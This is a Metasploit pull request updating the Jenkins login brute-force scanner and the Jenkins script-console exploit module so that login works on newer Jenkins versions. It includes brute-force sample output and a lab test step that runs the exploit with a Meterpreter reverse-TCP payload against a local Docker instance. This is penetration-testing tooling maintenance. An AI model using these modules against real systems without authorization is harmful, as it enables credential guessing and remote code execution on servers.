### PR TITLE
Update jenkins login scanner to work with newer versions

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/jenkins_login.md
+++ b/documentation/modules/auxiliary/scanner/http/jenkins_login.md
@@ -1,0 +1,186 @@
+## Vulnerable Application
+
+Jenkins is an open source continuous integration/continuous delivery and deployment (CI/CD) automation software DevOps 
+tool written in the Java programming language. It is used to implement CI/CD workflows, called pipelines, with packages 
+for Windows, Linux, macOS and other Unix-like operating systems. This module attempts to login to Jenkins with username 
+and password combinations.
+
+This exploit has been tested against the following Jenkins versions:
+* 2.401.1
+* 2.346.3
+* 2.103
+* 1.565
+
+## Verification Steps
+
+1. Install Jenkins and start it
+2. Start `msfconsole`
+3. Do: `use auxiliary/scanner/http/jenkins_login`
+4. Do: `set rhosts`
+5. Do: set usernames and passwords via the `username` and `password` options, or pass a list via `user_file` and `pass_file` options
+5. Do: `run`
+6. You will hopefully see something similar to, followed by a session:
+
+```
+[+] 127.0.0.1:8080 - Login Successful: admin:a6e7999109654c77a4d0b1222db1cad5
+```
+
+## Options
+
+### BLANK_PASSWORD
+
+Boolean value on if an additional login attempt should be attempted with an empty password for every user.
+
+### BRUTEFORCE_SPEED
+
+How fast to bruteforce, from 0 to 5
+
+### DB_ALL_CREDS
+
+Boolean value on to try each user/password couple stored in the current database
+
+### DB_ALL_PASS
+
+Boolean value on to add all passwords in the current database to the list
+
+### DB_ALL_USERS
+
+Boolean value on to add all users in the current database to the list
+
+### DB_SKIP_EXISTING
+
+Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
+
+### HTTP_METHOD
+
+The HTTP method to use for the login (Accepted: GET, POST)
+
+### PASSWORD
+
+Password to try for each user.
+
+### PASS_FILE
+
+A file containing a password on every line. Kali linux example: `/usr/share/wordlists/metasploit/password.lst`
+
+### PROXIES
+
+A proxy chain of format type:host:port[,type:host:port][...]
+
+### RHOSTS
+
+The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+
+### RPORT
+
+The target port (TCP)
+
+### SSL
+
+Boolean value on to negotiate SSL/TLS for outgoing connections
+
+### STOP_ON_SUCCESS
+
+Boolean value on to immediately stop attempting additional logins on that host if a valid login is found on a host
+
+### THREADS
+
+The number of concurrent threads (max one per host)
+
+### USERNAME
+
+Username to try for each password.
+
+### USERPASS_FILE
+
+A file containing a username and password, separated by a space, on every line. An example line would be `username
+password`.
+
+### USER_AS_PASS
+
+Boolean value on if an additional login attempt should be attempted with the password as the username.
+
+### USER_FILE
+
+A file containing a username on every line.
+
+### VERBOSE
+
+Show a failed login attempt. This can get rather verbose when a large `USER_FILE` or `PASS_FILE` is used. A failed
+attempt will look similar to the following:
+
+```
+...
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:6519d020f3d743d9bd6b60b777b55f86 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:d2fbc2973ce24146adb381d32e789269 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:foo (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:bar (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:5543 (Incorrect)
+...
+```
+
+## Scenarios
+
+### Single set of credentials being passed
+
+```
+msf6 auxiliary(scanner/http/jenkins_login) > run rhost=127.0.0.1 rport=8080 username=admin password=34c27512dda149ff8bc0d0854123562c
+
+[+] 127.0.0.1:8080 - Login Successful: admin:34c27512dda149ff8bc0d0854123562c
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Multiple credentials being passed
+
+```
+msf6 auxiliary(scanner/http/jenkins_login) > run rhost=127.0.0.1 rport=8080 user_file=users.txt pass_file=passwords.txt
+
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:6519d020f3d743d9bd6b60b777b55f86 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:d2fbc2973ce24146adb381d32e789269 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:foo (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:bar (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:5543 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:3a4eac65719e422daf9085d3bed4275e (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:22345sasdc (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: admin:34c27512dda149ff8bc0d0854123562c (Incorrect)
+[+] 127.0.0.1:8080 - Login Successful: admin:a6e7999109654c77a4d0b1222db1cad5
+[-] 127.0.0.1:8080 - LOGIN FAILED: foo:6519d020f3d743d9bd6b60b777b55f86 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: foo:d2fbc2973ce24146adb381d32e789269 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: foo:foo (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: foo:bar (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: foo:5543 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: foo:3a4eac65719e422daf9085d3bed4275e (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: foo:22345sasdc (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: foo:34c27512dda149ff8bc0d0854123562c (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: foo:a6e7999109654c77a4d0b1222db1cad5 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: bar:6519d020f3d743d9bd6b60b777b55f86 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: bar:d2fbc2973ce24146adb381d32e789269 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: bar:foo (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: bar:bar (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: bar:5543 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: bar:3a4eac65719e422daf9085d3bed4275e (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: bar:22345sasdc (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: bar:34c27512dda149ff8bc0d0854123562c (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: bar:a6e7999109654c77a4d0b1222db1cad5 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test:6519d020f3d743d9bd6b60b777b55f86 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test:d2fbc2973ce24146adb381d32e789269 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test:foo (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test:bar (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test:5543 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test:3a4eac65719e422daf9085d3bed4275e (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test:22345sasdc (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test:34c27512dda149ff8bc0d0854123562c (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test:a6e7999109654c77a4d0b1222db1cad5 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test2:6519d020f3d743d9bd6b60b777b55f86 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test2:d2fbc2973ce24146adb381d32e789269 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test2:foo (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test2:bar (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test2:5543 (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test2:3a4eac65719e422daf9085d3bed4275e (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test2:22345sasdc (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test2:34c27512dda149ff8bc0d0854123562c (Incorrect)
+[-] 127.0.0.1:8080 - LOGIN FAILED: test2:a6e7999109654c77a4d0b1222db1cad5 (Incorrect)
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/http/jenkins_login.md
+++ b/documentation/modules/auxiliary/scanner/http/jenkins_login.md
@@ -5,7 +5,14 @@ tool written in the Java programming language. It is used to implement CI/CD wor
 for Windows, Linux, macOS and other Unix-like operating systems. This module attempts to login to Jenkins with username 
 and password combinations.
 
+Jenkins can be downloaded from [jenkins.io](https://jenkins.io/) where
+binaries are available for a variety of operating systems. Both LTS and weekly
+builds are available.
+
 This exploit has been tested against the following Jenkins versions:
+* 2.411
+* 2.410
+* 2.409
 * 2.401.1
 * 2.346.3
 * 2.103

--- a/documentation/modules/exploit/multi/http/jenkins_script_console.md
+++ b/documentation/modules/exploit/multi/http/jenkins_script_console.md
@@ -8,6 +8,15 @@
   account in order to access it. A known account can be used with this module by
   setting the `USERNAME` and `PASSWORD` options.
 
+  This exploit has been tested against the following Jenkins versions:
+  * 2.411
+  * 2.410
+  * 2.409
+  * 2.401.1
+  * 2.346.3
+  * 2.103
+  * 1.565
+
 ## Verification Steps
 
   1. Install the application

--- a/lib/metasploit/framework/login_scanner/jenkins.rb
+++ b/lib/metasploit/framework/login_scanner/jenkins.rb
@@ -3,9 +3,10 @@ require 'metasploit/framework/login_scanner/http'
 module Metasploit
   module Framework
     module LoginScanner
-
       # Jenkins login scanner
       class Jenkins < HTTP
+
+        include Msf::Exploit::Remote::HTTP::Jenkins
 
         # Inherit LIKELY_PORTS,LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
         CAN_GET_SESSION = true
@@ -36,24 +37,17 @@ module Metasploit
           else
             result_opts[:service_name] = 'http'
           end
-          begin
-            res = send_request({
-              'method'=> method,
-              'uri'=> uri,
-              'vars_post'=> {
-                'j_username' => credential.public,
-                'j_password'=> credential.private
-                }
-            })
 
-            if res && res.headers['location'] && !res.headers['location'].include?('loginError')
-              result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.headers)
-            else
-              result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res)
-            end
-          rescue ::EOFError, Errno::ETIMEDOUT ,Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
-            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
+          status, proof = jenkins_login(credential.public, credential.private) do |request|
+            send_request({
+              'method' => method,
+              'uri' => uri,
+              'vars_post' => request['vars_post']
+            })
           end
+
+          result_opts.merge!(status: status, proof: proof)
+
           Result.new(result_opts)
         end
       end

--- a/lib/msf/core/exploit/remote/http/jenkins.rb
+++ b/lib/msf/core/exploit/remote/http/jenkins.rb
@@ -1,0 +1,57 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        # This module provides a way of logging into Jenkins
+        module Jenkins
+          include Msf::Exploit::Remote::HttpClient
+
+          # This method takes a target URI and makes a request to verify if logging in is posiible,
+          # otherwise it will fail gracefully
+          #
+          # @param [Sting] target_uri The targets URI
+          # @return [Hash] URI for successful login, Cookie that's needed by newer versions
+          def jenkins_uri_check(target_uri, keep_cookie: false)
+            uri_path = normalize_uri(target_uri.path)
+            uri_path << '/' if uri_path[-1, 1] != '/'
+
+            # get that first cookie that's needed by newer versions
+            res = send_request_cgi({ 'uri' => normalize_uri(uri_path, 'login'), 'keep_cookies' => keep_cookie })
+            cookie = res.headers['Set-Cookie'] if keep_cookie
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Unexpected reply from server') unless res&.code == 200
+            if res.body =~ /action="(j_([a-z0-9_]+))"/
+              uri = Regexp.last_match(1)
+            else
+              fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to identify the login resource.')
+            end
+
+            { uri: uri, cookie: cookie }.delete_if { |_k, v| v.nil? }
+          end
+
+          # This method takes a target URI and attempts to login to Jenkins and will either fail with appropriate errors
+          #
+          # @param [Sting] target_uri The targets URI
+          def jenkins_login(target_uri)
+            res = send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri(target_uri),
+              'keep_cookies' => true,
+              'vars_post' =>
+                {
+                  'j_username' => datastore['USERNAME'],
+                  'j_password' => datastore['PASSWORD'],
+                  'Submit' => 'log in'
+                }
+            })
+
+            if !(res && (res.code == 302)) || res.headers['Location'] =~ (/loginError/)
+              fail_with(Msf::Module::Failure::NoAccess, 'Login failed')
+            end
+          end
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/remote/http/jenkins.rb
+++ b/lib/msf/core/exploit/remote/http/jenkins.rb
@@ -6,20 +6,14 @@ module Msf
       module HTTP
         # This module provides a way of logging into Jenkins
         module Jenkins
-          include Msf::Exploit::Remote::HttpClient
-
-          # This method takes a target URI and makes a request to verify if logging in is posiible,
+          # This method takes a target URI and makes a request to verify if logging in is possible,
           # otherwise it will fail gracefully
           #
-          # @param [Sting] target_uri The targets URI
-          # @return [Hash] URI for successful login, Cookie that's needed by newer versions
-          def jenkins_uri_check(target_uri, keep_cookie: false)
-            uri_path = normalize_uri(target_uri.path)
-            uri_path << '/' if uri_path[-1, 1] != '/'
-
-            # get that first cookie that's needed by newer versions
-            res = send_request_cgi({ 'uri' => normalize_uri(uri_path, 'login'), 'keep_cookies' => keep_cookie })
-            cookie = res.headers['Set-Cookie'] if keep_cookie
+          # @param [URI, String] target_uri The targets URI
+          # @return [String] URI for successful login
+          def jenkins_uri_check(target_uri, keep_cookies: false)
+            # if keep_cookies is true we get the first cookie that's needed by newer Jenkins versions
+            res = send_request_cgi({ 'uri' => normalize_uri(target_uri, 'login'), 'keep_cookies' => keep_cookies })
             fail_with(Msf::Module::Failure::UnexpectedReply, 'Unexpected reply from server') unless res&.code == 200
             if res.body =~ /action="(j_([a-z0-9_]+))"/
               uri = Regexp.last_match(1)
@@ -27,28 +21,50 @@ module Msf
               fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to identify the login resource.')
             end
 
-            { uri: uri, cookie: cookie }.delete_if { |_k, v| v.nil? }
+            normalize_uri(target_uri, uri)
           end
 
-          # This method takes a target URI and attempts to login to Jenkins and will either fail with appropriate errors
+          # This method takes a username and password and a target URI
+          # then attempts to login to Jenkins and will either fail with appropriate errors
           #
-          # @param [Sting] target_uri The targets URI
-          def jenkins_login(target_uri)
-            res = send_request_cgi({
-              'method' => 'POST',
-              'uri' => normalize_uri(target_uri),
-              'keep_cookies' => true,
-              'vars_post' =>
-                {
-                  'j_username' => datastore['USERNAME'],
-                  'j_password' => datastore['PASSWORD'],
-                  'Submit' => 'log in'
-                }
-            })
+          # @param [String] username The username for login credentials
+          # @param [String] password The password for login credentials
+          # @return [Array] [status, proof] The result of the login attempt
+          def jenkins_login(username, password, target_uri = nil)
+            begin
+              request = {
+                'vars_post' =>
+                  {
+                    'j_username' => username,
+                    'j_password' => password,
+                    'Submit' => 'log in'
+                  }
+              }
 
-            if !(res && (res.code == 302)) || res.headers['Location'] =~ (/loginError/)
-              fail_with(Msf::Module::Failure::NoAccess, 'Login failed')
+              if block_given?
+                res = yield request
+              else
+                res = send_request_cgi({
+                  'method' => 'POST',
+                  'uri' => normalize_uri(target_uri),
+                  'keep_cookies' => true,
+                  'vars_post' => request['vars_post']
+                })
+              end
+
+              if res && res.headers['location'] && !res.headers['location'].include?('loginError')
+                status = Metasploit::Model::Login::Status::SUCCESSFUL
+                proof = res.headers
+              else
+                status = Metasploit::Model::Login::Status::INCORRECT
+                proof = res
+              end
+            rescue ::EOFError, Errno::ETIMEDOUT, Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
+              status = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+              proof = e
             end
+
+            [status, proof]
           end
         end
       end

--- a/modules/auxiliary/scanner/http/jenkins_login.rb
+++ b/modules/auxiliary/scanner/http/jenkins_login.rb
@@ -24,7 +24,8 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         OptEnum.new('HTTP_METHOD', [true, 'The HTTP method to use for the login', 'POST', ['GET', 'POST']]),
-        Opt::RPORT(8080)
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ false, 'The path to the Jenkins-CI application'])
       ])
 
     deregister_options('PASSWORD_SPRAY')
@@ -33,14 +34,13 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
-    fail_with(Msf::Exploit::Failure::BadConfig, 'LOGIN_URL is no longer supported.') unless datastore['LOGIN_URL'].nil?
+    print_warning("#{self.fullname} is still calling the deprecated LOGIN_URL option! This is no longer supported.") unless datastore['LOGIN_URL'].nil?
     cred_collection = build_credential_collection(
       username: datastore['USERNAME'],
       password: datastore['PASSWORD']
     )
 
-    uri_results = jenkins_uri_check(target_uri)
-    login_uri = uri_results[:uri]
+    login_uri = jenkins_uri_check(target_uri)
     scanner = Metasploit::Framework::LoginScanner::Jenkins.new(
       configure_http_login_scanner(
         uri: normalize_uri(login_uri),

--- a/modules/auxiliary/scanner/http/jenkins_login.rb
+++ b/modules/auxiliary/scanner/http/jenkins_login.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::AuthBrute
+  include Msf::Exploit::Remote::HTTP::Jenkins
 
   def initialize
     super(
@@ -22,7 +23,6 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        OptString.new('LOGIN_URL', [true, 'The URL that handles the login process', '/j_acegi_security_check']),
         OptEnum.new('HTTP_METHOD', [true, 'The HTTP method to use for the login', 'POST', ['GET', 'POST']]),
         Opt::RPORT(8080)
       ])
@@ -33,14 +33,17 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
+    fail_with(Msf::Exploit::Failure::BadConfig, 'LOGIN_URL is no longer supported.') unless datastore['LOGIN_URL'].nil?
     cred_collection = build_credential_collection(
       username: datastore['USERNAME'],
       password: datastore['PASSWORD']
     )
 
+    uri_results = jenkins_uri_check(target_uri)
+    login_uri = uri_results[:uri]
     scanner = Metasploit::Framework::LoginScanner::Jenkins.new(
       configure_http_login_scanner(
-        uri: datastore['LOGIN_URL'],
+        uri: normalize_uri(login_uri),
         method: datastore['HTTP_METHOD'],
         cred_details: cred_collection,
         stop_on_success: datastore['STOP_ON_SUCCESS'],

--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -89,7 +89,12 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def http_send_command(cmd, _opts = {})
+  # This method takes a command and options then attempts to make a request and returns a response
+  #
+  # @param [String] cmd The cmd used
+  # @param [String] _opts Request options
+  # @return [Rex::Proto::Http::Response, nil] res The result of the request
+  def http_send_request(cmd)
     request_parameters = {
       'method' => 'POST',
       'uri' => normalize_uri(@uri.path, 'script'),
@@ -101,10 +106,30 @@ class MetasploitModule < Msf::Exploit::Remote
         }
     }
     request_parameters['vars_post'][@crumb[:name]] = @crumb[:value] unless @crumb.nil?
-    res = send_request_cgi(request_parameters)
-    if !(res && (res.code == 200))
-      fail_with(Failure::Unknown, 'Failed to execute the command.')
+    send_request_cgi(request_parameters)
+  end
+
+  # This method takes a command and options then attempts to make a request to send the command
+  #
+  # @param [String] cmd The cmd used
+  # @param [String] _opts Request options
+  # @return [Rex::Proto::Http::Response] res The response of the request
+  def http_send_command(cmd, _opts = {})
+    res = http_send_request(cmd)
+
+    fail_with(Failure::Unknown, 'Failed to execute the command.') if res.nil?
+
+    # Attempt to login if we haven't previously
+    if res.code == 401 && !@attempted_login
+      print_status('Authentication required for Jenkins-CI Groovy script console - Logging in...')
+      attempt_jenkins_login
+      res = http_send_request(cmd)
     end
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to Jenkins - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") if res.code != 200
+
+    res
   end
 
   def java_craft_runtime_exec(cmd)
@@ -140,7 +165,21 @@ class MetasploitModule < Msf::Exploit::Remote
     http_send_command(cmd.to_s)
   end
 
+  # This method makes calls to multiple methods to handle Jenkins login attempts
+  def attempt_jenkins_login
+    @attempted_login = true
+    login_uri = jenkins_uri_check(@uri, keep_cookies: true)
+    status, _proof = jenkins_login(datastore['USERNAME'], datastore['PASSWORD'], login_uri)
+
+    if status == Metasploit::Model::Login::Status::INCORRECT
+      fail_with(Msf::Module::Failure::NoAccess, "Incorrect credentials - #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+    elsif status == Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+      fail_with(Msf::Module::Failure::UnexpectedReply, 'Unexpected reply from server')
+    end
+  end
+
   def exploit
+    @attempted_login = false
     @uri = target_uri
     @uri.path = normalize_uri(@uri.path)
     @uri.path << '/' if @uri.path[-1, 1] != '/'
@@ -162,11 +201,14 @@ class MetasploitModule < Msf::Exploit::Remote
         end
       else
         print_status('Logging in...')
-        uri_results = jenkins_uri_check(@uri, keep_cookie: true)
-        login_uri = uri_results[:uri]
-        jenkins_login(login_uri)
+        attempt_jenkins_login
         res = send_request_cgi({ 'uri' => "#{@uri.path}script" })
-        fail_with(Failure::UnexpectedReply, 'Unexpected reply from server') unless res&.code == 200
+
+        if res.code == 403
+          fail_with(Failure::NoAccess, "#{datastore['USERNAME']} does not have permissions to complete this request")
+        elsif res.code != 200
+          fail_with(Failure::UnexpectedReply, 'Unexpected reply from server')
+        end
       end
     else
       print_status('No authentication required, skipping login...')

--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HTTP::Jenkins
 
   def initialize(info = {})
     super(
@@ -161,31 +162,9 @@ class MetasploitModule < Msf::Exploit::Remote
         end
       else
         print_status('Logging in...')
-        # get that first cookie that's needed by newer versions
-        res = send_request_cgi({ 'uri' => normalize_uri(@uri.path, 'login'), 'keep_cookies' => true })
-        fail_with(Failure::UnexpectedReply, 'Unexpected reply from server') unless res&.code == 200
-        if res.body =~ /action="(j_([a-z0-9_]+))"/
-          uri = Regexp.last_match(1)
-        else
-          fail_with(Failure::UnexpectedReply, 'Failed to identify the login resource.')
-        end
-
-        res = send_request_cgi({
-          'method' => 'POST',
-          'uri' => normalize_uri(@uri.path, uri),
-          'keep_cookies' => true,
-          'vars_post' =>
-            {
-              'j_username' => datastore['USERNAME'],
-              'j_password' => datastore['PASSWORD'],
-              'Submit' => 'log in'
-            }
-        })
-
-        if !(res && (res.code == 302)) || res.headers['Location'] =~ (/loginError/)
-          fail_with(Failure::NoAccess, 'Login failed')
-        end
-
+        uri_results = jenkins_uri_check(@uri, keep_cookie: true)
+        login_uri = uri_results[:uri]
+        jenkins_login(login_uri)
         res = send_request_cgi({ 'uri' => "#{@uri.path}script" })
         fail_with(Failure::UnexpectedReply, 'Unexpected reply from server') unless res&.code == 200
       end


### PR DESCRIPTION
This PR fixes #17977.

This PR updates Jenkins modules to work with newer versions, previously they fell over with a CSRF failure, and false negative.

Tested against Jenkins versions:
- 2.411 🟢 
- 2.410 🟢 
- 2.409 🟢 
- 2.401.1  🟢 
- 2.346.3 🟢 
-  2.103 🟢 
- 1.565 🟢 

Note: on `1.565` you need to go to [Configure Global Security](http://127.0.0.1:8080/configureSecurity/) then enable the below settings, then sign up:
![image](https://github.com/rapid7/metasploit-framework/assets/69522014/ad48e924-230a-4c4d-9d0a-46f4c53d514c)

## Before
![image](https://github.com/rapid7/metasploit-framework/assets/69522014/0cda9350-bd62-42d9-a59a-66bb128972b3)

## After
![image](https://github.com/rapid7/metasploit-framework/assets/69522014/792cd8ff-5253-4d42-a85c-66edafbf3d24)


## Target setup
First you'll need a target setup. I followed the setup outlined here:

Run and set up jenkins in docker:

  1. Run `docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:latest`
  1. Extract the Administrator password:
     1. Extract the container id with `docker ps`
     2. Extract the password with `docker exec $containerIdHere /bin/bash -c 'cat /var/jenkins_home/secrets/initialAdminPassword'`
  1. Visit `http://127.0.0.1:8080`
  1. Use the default setup and install "suggested plugins"

## Verification `jenkins_login`
- [ ] Start `msfconsole`
- [ ] `use scanner/http/jenkins_login`
- [ ]  Run `run rhost=127.0.0.1 rport=8080 username=admin password=<Listed when setting up Docker container>`
- [ ] **Verify** the module now completes successfully

## Verification `jenkins_script_console`
- [ ] `use modules/exploits/multi/http/jenkins_script_console.rb`
- [ ] `run http://admin:<Listed when setting up Docker container>@<LHOST>:8080/ lhost=<LHOST> target=Linux payload=linux/x86/meterpreter/reverse_tcp`
- [ ] **Verify** the module now completes successfully